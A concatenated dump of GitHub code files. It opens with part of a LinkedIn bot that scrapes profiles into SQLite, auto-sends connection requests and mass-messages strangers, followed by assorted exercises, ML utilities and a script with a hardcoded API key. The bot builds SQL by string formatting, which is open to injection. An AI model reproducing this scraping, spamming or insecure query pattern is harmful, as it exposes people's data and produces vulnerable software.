split_person_object[2]\n certification = split_person_object[3]\n ID = split_person_object[4]\n if len(split_person_object) == 4:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = split_person_object[3]\n elif len(split_person_object) == 3:\n first_name = split_person_object[1]\n last_name = split_person_object[2]\n certification = \"None\"\n ID = str(split_person_object[1]) + str(split_person_object[2])\n elif len(split_person_object) == 2:\n first_name = split_person_object[1]\n last_name = \"None\"\n certification = \"None\"\n\n person = {\n 'ID' : ID,\n 'first_name' : first_name,\n 'last_name' : last_name,\n 'certification' : certification, \n 'added' : False, \n 'URL' : person_url, \n 'position_desc' : 'None',\n 'job_potential' : False,\n 'messaged' : False\n }\n\n people_list.append(person)\n\n return people_list\n\n def open_database(self):\n ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n DB_PATH = os.path.join(ROOT_DIR, 'LinkedIn_People.db')\n\n try:\n db_connection = sqlite3.connect(DB_PATH)\n return db_connection\n except DB_ERROR as e:\n print(e)\n return None\n return None\n\n def database_write(self, people_list):\n db_connection = self.open_database()\n\n try:\n self.create_table(db_connection)\n db_connection.commit()\n self.append_people(people_list, db_connection)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n finally:\n db_connection.close()\n\n def create_table(self, db_connection):\n\n create_table = \"\"\" CREATE TABLE IF NOT EXISTS people (\n ID text PRIMARY KEY UNIQUE,\n first_name text NOT NULL,\n last_name text NOT NULL, \n certification text, \n added boolean, \n URL text NOT NULL, \n position_desc text,\n job_potential boolean,\n messaged boolean\n ) \"\"\"\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(create_table)\n except DB_ERROR as e:\n print(e)\n\n def append_people(self, people_list, db_connection):\n \n try:\n db_cursor = db_connection.cursor()\n\n for person in people_list:\n columns = ', '.join(person.keys())\n values = \"'{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\".format(str(person[\"ID\"]), str(person[\"first_name\"]), str(person[\"last_name\"]), str(person[\"certification\"]), person[\"added\"], person[\"URL\"], person[\"position_desc\"], person[\"job_potential\"], person[\"messaged\"])\n # values = ''\n command = 'INSERT INTO people ({}) VALUES({})'.format(columns, values)\n\n try:\n db_cursor.execute(command)\n except DB_ERROR as e:\n print(e)\n except DB_ERROR as e:\n print(e)\n\n def query_db(self, db_connection, select_condition):\n\n target_list = []\n\n statement = \"\"\"\n SELECT * FROM people WHERE {}\n \"\"\".format(select_condition)\n\n try: \n db_cursor = db_connection.cursor()\n db_cursor.execute(statement)\n\n entries = db_cursor.fetchall()\n\n for entry in entries:\n target_list.append(entry)\n\n return target_list\n \n except DB_ERROR as e:\n print(e)\n return\n\n except Exception as e:\n print(e)\n return \n\n def find_not_added(self, db_connection):\n \n try:\n not_added = self.query_db(db_connection, select_condition=\"added='False' AND messaged <> 'True'\" )\n return not_added\n except DB_ERROR as e:\n print(e)\n return \n\n def format_stored_people(self, people_not_yet_added):\n\n people = []\n\n random.shuffle(people_not_yet_added)\n\n for person in people_not_yet_added:\n person_url = person[5]\n person_id = person[0]\n\n person = {\n \"ID\" : person_id,\n \"URL\" : person_url\n }\n\n people.append(person)\n\n return people\n\n def add_friends(self, urls_and_ids, db_connection, num_profiles, add_mode):\n \n profiles_visited = 0\n\n while profiles_visited < num_profiles:\n for url_and_id in urls_and_ids:\n url = url_and_id[\"URL\"]\n ID = url_and_id[\"ID\"]\n self.navigate_to_url(url, random.uniform(3.5, 5.9))\n job_description = self.acquire_job_description()\n first_name, last_name = self.acquire_full_name()\n if add_mode:\n self.connect_to_person()\n self.update_person(url, db_connection, job_description)\n else:\n self.update_database(db_connection, \"SET position_desc = '{}', first_name = '{}', last_name = '{}'\".format(job_description, first_name, last_name), \"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {}'s job description updated to: {}\".format(first_name, last_name, ID, job_description))\n profiles_visited += 1\n\n def update_person(self, candidate_url, db_connection, job_description):\n\n split_url = candidate_url.replace(\"/\", \" \").replace(\"-\", \" \").split()\n \n if len(split_url) == 7:\n ID = split_url[5]\n elif len(split_url) == 6:\n ID = split_url[5]\n elif len(split_url) == 5:\n ID = str(split_url[3]) + str(split_url[4])\n elif len(split_url) == 4:\n ID = split_url[3]\n\n # Returns a DB entry of one person that hasn't been added yet\n # And hasn't been messaged yet\n person_not_connected = self.query_db(db_connection, select_condition=\"WHERE ID = '{}' AND added <> 'True' AND messaged <> 'True'\".format(ID))\n \n if person_not_connected:\n # Mark person as not connected in the DB\n self.update_database(db_connection, sql_set_command=\"SET added = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n\n else:\n # No entries were returned from the DB which means that \n # 1) Entry doesn't exist\n # 2) Entry has been added already\n # 3) Entry has been messaged already\n print(\"Person with the ID {} has already been added\".format(ID))\n\n def connect_to_person(self):\n\n try:\n # Click the connect button\n connect_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n connect_button.click()\n # Wait for browser to load\n time.sleep(2)\n # Click the 'Send now' button\n send_now_button = self.browser.find_element_by_xpath(\"//button[text()='Send now']\")\n send_now_button.click()\n print(\"Person added\")\n return True \n except NoSuchElementException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False \n except WebDriverException as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n except Exception as e:\n print(e)\n print(\"An error arose... Bypassing Send Now button... Database to be updated.\")\n return False\n\n def acquire_job_description(self):\n current_page = self.get_page_source()\n job_description_with_tags = current_page.find(\"h2\")\n job_description = job_description_with_tags.text\n job_description = str(job_description)\n job_description = job_description.replace(\"\\n\", \"\")\n formatted_js = re.sub(\"\\s\\s+\", \"\", job_description)\n return formatted_js\n\n def acquire_full_name(self):\n\n try:\n current_page = self.get_page_source()\n full_name_with_tags = current_page.find(\"h1\", {\"class\" : \"pv-top-card-section__name\"})\n full_name = full_name_with_tags.text\n full_name = str(full_name)\n full_name = full_name.replace(\"\\n\", \"\")\n full_name = re.sub(\"\\s\\s+\", \"\", full_name)\n split_name = full_name.split(\" \")\n if len(split_name) == 1:\n first_name = split_name[0]\n last_name = 'None'\n if len(split_name) == 2:\n first_name = split_name[0]\n last_name = split_name[1]\n elif len(split_name) > 2:\n first_name = split_name[0]\n last_name = split_name[len(split_name) - 1]\n\n except AttributeError as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n except Exception as e:\n print(e)\n first_name = \"None\"\n last_name = \"None\"\n\n return first_name, last_name\n\n\n def find_updated_job_descriptions(self, db_connection):\n\n matches = []\n\n # Find people who have a job description that haven't been messaged yet\n sql_job_description_command = \"position_desc <> 'None' AND messaged <> 'True'\"\n\n # Execute search in DB\n people_with_job_descriptions = self.query_db(db_connection, select_condition=sql_job_description_command)\n\n for person in people_with_job_descriptions:\n\n # Grab the 6th index of the resultant people from the db\n job_description = person[6]\n\n # Compare the resultant people against the text file for job keywords\n # and compare against the list of elimination keywords\n each_match = self.compare_desc_against_criteria(job_description, person)\n\n if each_match:\n matches.append(each_match)\n\n return matches\n\n\n def compare_desc_against_criteria(self, job_description, person):\n\n SEARCH_CRITERIA_TXT = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'txt/search_criteria.txt')\n \n matches = []\n\n ignore_criteria = [\n \"FCA\", \n \"FCA Fiat Chrysler Automobiles\",\n \"Jeep\",\n \"Operations\", \n \"DHL\", \n \"Chrysler\", \n \"Fiat\", \n \"Mopar\", \n \"Supply Chain\", \n \"WCM\", \n \"Logistics\", \n \"MLM\", \n \"Quality\",\n \"Retail\", \n \"Student\", \n \"Clerical\", \n \"Intern\", \n \"Sales\"\n ]\n \n # Open the text file where I have the keywords defined\n match_criteria = open(SEARCH_CRITERIA_TXT, 'r')\n\n job_description = str(job_description)\n \n for match_description in match_criteria:\n\n # Format the text file so we can iterate properly\n match_description = match_description.strip()\n match_description = match_description.replace(\" \", \"\")\n match_description = str(match_description)\n\n if match_description:\n\n # Read in the list of keywords that we want to ignore\n for ignore_description in ignore_criteria:\n\n # Format them so we can work with them\n ignore_description = ignore_description.replace(\" \", \"\")\n ignore_description = str(ignore_description)\n\n # If the target keyword is in their job description\n if match_description in job_description:\n\n # If the name triggers the list of words we want to avoid\n if ignore_description in job_description:\n\n # throw it out\n return \n\n else:\n\n # If we haven't already added it, add it\n if person not in matches:\n\n if person:\n matches.append(person)\n\n match_criteria.close()\n return matches\n\n def get_matching_candidates(self, db_connection):\n\n candidates = []\n\n sql_search_command = \"WHERE job_potential = 'True' AND messaged = 'False'\"\n\n matching_candidates = self.query_db(db_connection, select_condition=sql_search_command)\n\n for candidate in matching_candidates:\n if candidate:\n candidates.append(candidate)\n\n return candidate\n\n\n def message_candidates(self, candidates):\n\n for candidate in candidates:\n ID = candidate[0]\n first_name = candidate[1]\n last_name = candidate[2]\n candidate_url = candidate[5]\n\n if candidate_url:\n self.navigate_to_url(candidate_url, 2)\n page = self.get_page_source()\n\n span_text = page.find(\"span\", {\"class\": \"pv-s-profile-actions__label\"}).text\n if span_text == 'Message':\n self.send_message(ID, first_name, last_name)\n elif span_text == 'Pending':\n print(\"Connection Request is pending for {} {} with the ID {}. Proceeding to the next candidate\".format(first_name, last_name, ID))\n else:\n print(\"Another issue arose, proceeding to the next candidate\")\n\n def message_with_subject(self, first_name):\n\n first_name = first_name.title()\n\n subject = \"Hi {}\".format(first_name)\n\n message = \"\"\"My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping \n hear from you {}! Have a nice day!\"\"\".format(first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return subject, message\n\n def message_no_subject(self, first_name):\n\n first_name = first_name.title()\n\n message = \"\"\"Hi {}. My name is Jarret Laberdee, I'm an aspiring software developer looking for connections here, on LinkedIn. Sorry for the intrusive message but \n your profile stuck out to me. \n While my motive is to find a job in the technological sector, I'm really just looking to expand my network of associates. I would love to hear from you! \n If any of this is resonating, you can check out some of my work on my website, http://www.carnsjalone.com. Hoping \n hear from you {}! Have a nice day!\"\"\".format(first_name, first_name)\n\n message = message.replace(\"\\n\", \" \")\n message = re.sub(\"\\s\\s+\", \" \", message)\n\n return message\n\n\n def send_message(self, ID, first_name, last_name):\n\n db_connection = self.open_database()\n\n premium_url = \"https://www.linkedin.com/premium/products\"\n\n send_message_button = self.browser.find_element_by_class_name(\"pv-s-profile-actions__label\")\n send_message_button.click()\n\n time.sleep(2)\n\n current_url = self.browser.current_url\n\n if premium_url in current_url:\n print(\"Messaging {} {} with the ID {} has been forwarded to premium account URL, skipping to next candidate...\".format(first_name, last_name, ID))\n return \n else:\n \n time.sleep(1)\n\n # If there's no issue with the subject form, return a tuple from the format message function\n subject, message = self.message_with_subject(first_name)\n \n # Begin message with a subject line\n\n try:\n # Type the subject to the candidate\n message_form_subject = self.browser.find_element_by_class_name(\"msg-form__subject\")\n message_form_subject.send_keys(subject)\n\n except NoSuchElementException as e:\n\n # Begin message with no subject line\n\n print(e + \"\\nExecuting message with no subject function...\\n\")\n \n # If there's an issue with the subject form ie it's not there, returns a single string from the errored format\n message = self.message_no_subject(first_name)\n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n \n except NoSuchElementException as e:\n print(e + \"\\n\")\n pass\n \n except WebDriverException as e:\n print(e + \"\\n\")\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n pass\n\n try:\n \n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n \n except NoSuchElementException as e:\n print(e)\n pass\n \n except WebDriverException as e:\n print(e)\n pass\n \n except Exception as e:\n print(e + \"\\n\")\n\n except WebDriverException as e:\n print(e + \"\\n\")\n return \n \n except Exception as e:\n print(e + \"\\n\")\n return \n\n try:\n # Type the message to the candidate\n message_form_message = self.browser.find_element_by_class_name(\"msg-form__contenteditable\")\n message_form_message.send_keys(message)\n print(\"Sending message to {} {} with the ID {}.\".format(first_name, last_name, ID))\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n except Exception as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n # Click the submit button\n message_form_submit_button = self.browser.find_element_by_class_name(\"msg-form__send-button\")\n message_form_submit_button.click()\n except NoSuchElementException as e:\n print(e)\n pass\n except WebDriverException as e:\n print(e)\n pass\n\n time.sleep(1)\n\n try:\n self.update_database(db_connection, sql_set_command=\"SET messaged = 'True'\", sql_where_command=\"WHERE ID = '{}'\".format(ID))\n print(\"{} {} with the ID {} has been set to 'Messaged' in the database.\".format(first_name, last_name, ID))\n except Exception as e:\n print(e)\n\n db_connection.close()\n\n def update_database(self, db_connection, sql_set_command, sql_where_command):\n\n update_command = \"\"\"\n UPDATE people\n {} \n {}\n \"\"\".format(sql_set_command, sql_where_command)\n\n try:\n db_cursor = db_connection.cursor()\n db_cursor.execute(update_command)\n db_connection.commit()\n except DB_ERROR as e:\n print(e)\n return\n except Exception as e:\n print(e)\n return\n\n\n \n\n\n\n\n\n\n \n \n \n\n\n \n\n\n\n\n\n \n\n\n\n","repo_name":"CarnsJalone/LinkedIn_Bot","sub_path":"py_files/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":24298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"19229958256","text":"from aiogram.types import ChatMemberUpdated\nfrom sqlalchemy.orm import selectinload\n\nfrom bot.models import Group, User\nfrom bot.repositories.uow import UnitOfWork\n\n\nasync def invite_member(event: ChatMemberUpdated, uow: UnitOfWork):\n group = await uow.groups.get_by_id(event.chat.id, [selectinload(Group.users)])\n if group is None:\n group = Group(\n id=event.chat.id,\n title=event.chat.title\n )\n await uow.groups.create(group)\n\n user = await uow.groups.get_by_id(event.new_chat_member.user.id, [selectinload(User.groups)])\n if user is None:\n user = User(\n id=event.new_chat_member.user.id,\n username=f\"@{event.new_chat_member.user.username}\"\n if event.new_chat_member.user.username\n else event.new_chat_member.user.full_name\n )\n await uow.groups.create(user)\n\n group.users.append(user)\n","repo_name":"fictadvisor/fice-sc-bot","sub_path":"bot/routes/group/invite_member.py","file_name":"invite_member.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39191267187","text":"\"\"\"\n제출 번호: 47362584\n아이디: adviate\n문제: 2204\n결과: 맞았습니다!!\n메모리: 30840 KB \n시간: 68 ms\n언어: Python 3\n코드 길이: 253 B\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nwhile(True):\n N = int(input())\n if N == 0:\n break\n\n dic = {}\n for i in range(N):\n s = input().rstrip()\n dic[s.lower()] = s\n\n tmp = sorted(list(dic.keys()))\n print(dic[tmp[0]])\n","repo_name":"kryowen/BaekJoon_Solution","sub_path":"PY/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39012890662","text":"##game/status\nimport requests\nimport json\n\n### Key ###\napi = 'b5d5bd555a1501b7324a020b229f7acdbf52afdea9bc2d5f96a74cf6d2e94780'\n### playername ####\nname = 'pia'\n### uid ###\nid = '111113'\n\nstat = requests.get('http://20.196.214.79:5050/game/status?key={api}&playername={name}')\nprint(\"statusRequest:\", stat.content)\nprint(\"status :\", stat.status_code)\n\nview = requests.get(f'http://20.196.214.79:5050/game/view?key={api}&uid={id}')\nprint(\"viewRequest:\", view.content)\nprint(\"status :\", view.status_code)","repo_name":"Jaejuna/Tank_simulator","sub_path":"agents/status_view.py","file_name":"status_view.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72461207790","text":"def normalize(name):\n return list(map(fn, name))\n\ndef fn(s):\n return s[0].upper() + s[1:].lower()\n\n# 测试:\nL1 = ['adam', 'LISA', 'barT']\nL2 = normalize(L1)\nprint(L2)\n\n\n\nfrom functools import reduce\ndef prod(L):\n return reduce(lambda x,y:x*y, L)\n\nprint('3 * 5 * 7 * 9 =', prod([3, 5, 7, 9]))\nif prod([3, 5, 7, 9]) == 945:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\ndef str2float(s):\n x1 = s[:s.find('.')]\n y1 = s[s.find('.')+1:]\n print(x1,y1)\n x2 = reduce(lambda x,y:x*10+y, map(int,x1))\n y2 = reduce(lambda x,y:x*10+y, map(int,y1)) / (10**len(y1))\n print(x2, y2, x2+y2)\n return x2+y2\n\ndef str2float2(s):\n ss = s.split('.')\n print(ss,list(map(int,ss)))\n return reduce(lambda x,y:x+y/(10**len(ss[1])), map(int,ss)) \n\nresult = str2float2('123.456')\nprint('str2float(\\'123.456\\') =', result)\nif abs(result - 123.456) < 0.00001:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\n# 素数/质数\ndef _odd_iter():\n n = 1\n while True:\n n += 2\n yield n\n\ndef _not_divisible(n):\n return lambda x: x % n > 0\n\ndef primes():\n yield 2\n it = _odd_iter()\n while True:\n n = next(it)\n yield n\n it = filter(_not_divisible(n), it)\n\nfor n in primes():\n if n < 100:\n print(n)\n else:\n break\n\n\n# 回数 \ndef is_palindrome(n):\n return str(n) == str(n)[::-1]\n\n# 测试:\noutput = filter(is_palindrome, range(1, 200))\nprint('1~200:', list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n print('测试成功!')\nelse:\n print('测试失败!')\n\n\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n return t[0].lower()\n \nL2 = sorted(L, key=by_name)\nprint(L2)\n","repo_name":"vectorxxxx/04-Python","sub_path":"04-函数式编程/函数式编程.py","file_name":"函数式编程.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1145004705","text":"import torch\r\nfrom torch.nn import init\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F \r\nimport functools\r\n\r\ndef load_state_dict(state_dict, net):\r\n model_dict = net.state_dict()\r\n\r\n pretrained_dict = {k: v for k, v in state_dict.items() if k in model_dict} \r\n\r\n for k, v in pretrained_dict.items(): \r\n if v.size() == model_dict[k].size():\r\n model_dict[k] = v\r\n\r\n not_initialized = set()\r\n \r\n for k, v in model_dict.items():\r\n if k not in pretrained_dict or v.size() != pretrained_dict[k].size():\r\n not_initialized.add(k.split('.')[0])\r\n \r\n print('not initialized', sorted(not_initialized))\r\n net.load_state_dict(model_dict) \r\n\r\n return net\r\n \r\ndef conv3x3(in_planes, out_planes, strd=1, padding=1, bias=False):\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3,\r\n stride=strd, padding=padding, bias=bias)\r\n\r\ndef init_weights(net, init_type='normal', init_gain=0.02):\r\n def init_func(m): # define the initialization function\r\n classname = m.__class__.__name__\r\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\r\n if init_type == 'normal':\r\n init.normal_(m.weight.data, 0.0, init_gain)\r\n elif init_type == 'xavier':\r\n init.xavier_normal_(m.weight.data, gain=init_gain)\r\n elif init_type == 'kaiming':\r\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\r\n elif init_type == 'orthogonal':\r\n init.orthogonal_(m.weight.data, gain=init_gain)\r\n else:\r\n raise NotImplementedError('initialization method [%s] is not implemented' % init_type)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n init.constant_(m.bias.data, 0.0)\r\n elif classname.find(\r\n 'BatchNorm2d') != -1:\r\n init.normal_(m.weight.data, 1.0, init_gain)\r\n init.constant_(m.bias.data, 0.0)\r\n\r\n print('initialize network with %s' % init_type)\r\n net.apply(init_func)\r\n\r\ndef init_net(net, init_type='normal', init_gain=0.02, gpu_ids=[]):\r\n if len(gpu_ids) > 0:\r\n assert (torch.cuda.is_available())\r\n net.to(gpu_ids[0])\r\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\r\n init_weights(net, init_type, init_gain=init_gain)\r\n return net\r\n\r\nclass CustomBCELoss(nn.Module):\r\n def __init__(self, brock=False, gamma=None):\r\n super(CustomBCELoss, self).__init__()\r\n self.brock = brock\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n x_hat = torch.clamp(pred, 1e-5, 1.0-1e-5) # prevent log(0) from happening\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n if self.brock:\r\n x = 3.0*gt - 1.0 # rescaled to [-1,2]\r\n\r\n loss = -(gamma*x*torch.log(x_hat) + (1.0-gamma)*(1.0-x)*torch.log(1.0-x_hat))\r\n else:\r\n loss = -(gamma*gt*torch.log(x_hat) + (1.0-gamma)*(1.0-gt)*torch.log(1.0-x_hat))\r\n\r\n if w is not None:\r\n if len(w.size()) == 1:\r\n w = w[:,None,None] \r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\nclass CustomMSELoss(nn.Module):\r\n def __init__(self, gamma=None):\r\n super(CustomMSELoss, self).__init__()\r\n self.gamma = gamma\r\n\r\n def forward(self, pred, gt, gamma, w=None):\r\n gamma = gamma[:,None,None] if self.gamma is None else self.gamma\r\n weight = gamma * gt + (1.0-gamma) * (1 - gt)\r\n loss = (weight * (pred - gt).pow(2)).mean()\r\n\r\n if w is not None:\r\n return (loss * w).mean()\r\n else:\r\n return loss.mean()\r\n\r\ndef createMLP(dims, norm='bn', activation='relu', last_op=nn.Tanh(), dropout=False):\r\n act = None\r\n if activation == 'relu':\r\n act = nn.ReLU()\r\n if activation == 'lrelu':\r\n act = nn.LeakyReLU()\r\n if activation == 'selu':\r\n act = nn.SELU()\r\n if activation == 'elu':\r\n act = nn.ELU()\r\n if activation == 'prelu':\r\n act = nn.PReLU()\r\n\r\n mlp = []\r\n for i in range(1,len(dims)):\r\n if norm == 'bn':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.BatchNorm1d(dims[i])]\r\n if norm == 'in':\r\n mlp += [ nn.Linear(dims[i-1], dims[i]),\r\n nn.InstanceNorm1d(dims[i])]\r\n if norm == 'wn':\r\n mlp += [ nn.utils.weight_norm(nn.Linear(dims[i-1], dims[i]), name='weight')]\r\n if norm == 'none':\r\n mlp += [ nn.Linear(dims[i-1], dims[i])]\r\n \r\n if i != len(dims)-1:\r\n if act is not None:\r\n mlp += [act]\r\n if dropout:\r\n mlp += [nn.Dropout(0.2)]\r\n\r\n if last_op is not None:\r\n mlp += [last_op]\r\n\r\n return mlp","repo_name":"Abhilash23x/project_model","sub_path":"lib/net_util.py","file_name":"net_util.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31808782925","text":"\"\"\"\nAssert that the CycleGan model is imported correctly\n\"\"\"\nimport unittest\nimport torch\nimport os\nfrom models.CycleGan import CycleGan\n\ndef numel(net):\n return sum(p.numel() for p in net.parameters())\n\nnet = CycleGan()\n\nclass TestCycleGan(unittest.TestCase):\n def test_cg_nparams(self): \n nparams = numel(net)\n self.assertEqual(nparams, 14142916 * 2)\n \n def test_cg_output_shape(self):\n dirname = os.path.dirname(__file__)\n filename = dirname + '/test_files/input.pt'\n x = torch.load(filename)\n bsize = x.shape[0]\n\n with torch.no_grad():\n y1 = net.genX(x)\n self.assertEqual(y1.shape, (bsize, 3, 256, 256))\n\n y2 = net.genY(x)\n self.assertEqual(y2.shape, (bsize, 3, 256, 256))\n \n z1 = net.disY(y1)\n self.assertEqual(z1.shape, (bsize, 1, 30, 30))\n \n z2 = net.disX(y2)\n self.assertEqual(z2.shape, (bsize, 1, 30, 30))\n \n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"deepakhr1999/cyclegans","sub_path":"test/test_cyclegan.py","file_name":"test_cyclegan.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"23957175802","text":"def get_coords():\n with open(\"input\") as f:\n return [tuple([int(x.strip()) for x in x.split(\",\")]) for x in f.read().split(\"\\n\") if len(x) > 0]\n\ndef manhattan_dist(sx, sy, ex, ey):\n return abs(sx - ex) + abs(sy - ey)\n\ndef fill_grid(coords):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n\n grid = [[dict() for x in range(max_x)] for y in range(max_y)]\n\n for (idx, (x, y)) in enumerate(coords):\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n grid[gy][gx][idx] = manhattan_dist(x, y, gx, gy)\n\n return grid\n\ndef get_grid_ids(grid):\n res = grid\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n min_dist = min(grid[gy][gx].values())\n if list(grid[gy][gx].values()).count(min_dist) > 1:\n res[gy][gx] = None\n else:\n res[gy][gx] = [idx for (idx, x) in grid[gy][gx].items() if x == min_dist][0]\n return res\n\ndef get_infinites(grid):\n borders = set()\n for x in grid[0]:\n if x is not None:\n borders.add(x)\n for x in grid[-1]:\n if x is not None:\n borders.add(x)\n for y in grid:\n if y[0] is not None:\n borders.add(y[0])\n if y[-1] is not None:\n borders.add(y[-1])\n\n return borders\n\ndef count_idx(grid, idx):\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] == idx:\n count += 1\n return count\n\ndef get_biggest_region_idx(coords, grid, infinites):\n res = list()\n for (idx, (x, y)) in enumerate(coords):\n if idx in infinites:\n continue\n res.append((idx, count_idx(grid, idx)))\n return max(res, key=lambda x: x[1])\n\ndef get_grid_max_dist_region_size(coords, max_dist):\n max_x = max(coords, key=lambda x: x[0])[0]\n max_y = max(coords, key=lambda x: x[1])[1]\n grid = [[0 for x in range(max_x)] for y in range(max_y)]\n\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n for (x, y) in coords:\n grid[gy][gx] += manhattan_dist(x, y, gx, gy)\n\n count = 0\n for gy in range(len(grid)):\n for gx in range(len(grid[gy])):\n if grid[gy][gx] < max_dist:\n count += 1\n return count\n\ndef run():\n coords = get_coords()\n\n # Get a grid with each item marked with the co-ordinate ID and the\n # Manhattan distance to each cell within the grid\n grid = fill_grid(coords)\n\n # Conver each item in the grid to the ID of the co-ordinate that is closest\n grid_ids = get_grid_ids(grid)\n\n # Get a set of all co-ordinate IDs for co-ordinate regions that are\n # infinitely large (i.e. are against the border)\n infinite_items = get_infinites(grid_ids)\n\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)[1]\n )\n )\n\n print(\n \"The size of the region which is at least 10,000 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 10000)\n )\n )\n\ndef run_test():\n coords = [(1, 1), (1, 6), (8, 3), (3, 4), (5, 5), (8, 9)]\n grid = fill_grid(coords)\n grid_ids = get_grid_ids(grid)\n print(grid_ids)\n infinite_items = get_infinites(grid_ids)\n print(\n \"The size of the largest area that is not infinite is: {}\".format(\n get_biggest_region_idx(coords, grid_ids, infinite_items)\n )\n )\n print(\n \"The size of the region which is at least 32 units close to any co-ordinate is: {}\".format(\n get_grid_max_dist_region_size(coords, 32)\n )\n )\n\nrun()\n#run_test()\n","repo_name":"polaris64/advent-of-code","sub_path":"2018/06/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"21790571792","text":"\"\"\"\nthis script equalizes the mean and std of the convolutions of a VGG network.\nIt is used to make the VGG network used in the Gatys et al. style transfer\npaper to be compatible with the VGG network used in the Johnson et al. paper.\nIt equalizes the contribution of each layer to the loss.\n\n./stylevgg \n\n must be a constructor in torchelie.models\n\"\"\"\nimport torch\nfrom torchelie.datasets import FastImageFolder\nimport torchvision.transforms as TF\nimport torchelie.models as tchm\nimport torchelie as tch\nimport sys\n\ntorch.autograd.set_grad_enabled(False)\n\nimagenet_path = sys.argv[2]\n\nmodel = sys.argv[1]\nm = tchm.__dict__[model](1000, pretrained='classification/imagenet')\ndel m.classifier\nm.cuda()\nm.eval()\n\nds = FastImageFolder(imagenet_path,\n transform=TF.Compose([\n TF.Resize(256),\n TF.CenterCrop(224),\n TF.ToTensor(),\n tch.nn.ImageNetInputNorm()\n ]))\n\nbatches = [\n b[0] for _, b in zip(\n range(200), torch.utils.data.DataLoader(\n ds, batch_size=320, shuffle=True))\n]\n\nbatch = batches[0].cuda()\n\n\ndef flatvgg():\n layers = []\n\n def _rec(m):\n if len(list(m.children())) == 0:\n layers.append(m)\n else:\n for mm in m.children():\n _rec(mm)\n\n _rec(m.features)\n return torch.nn.Sequential(*layers)\n\n\nidxs = [\n i for i, nm in enumerate(dict(m.features.named_children()).keys())\n if 'conv' in nm\n]\nflat = flatvgg()\n\nflatidxs = [i for i, l in enumerate(flat) if isinstance(l, 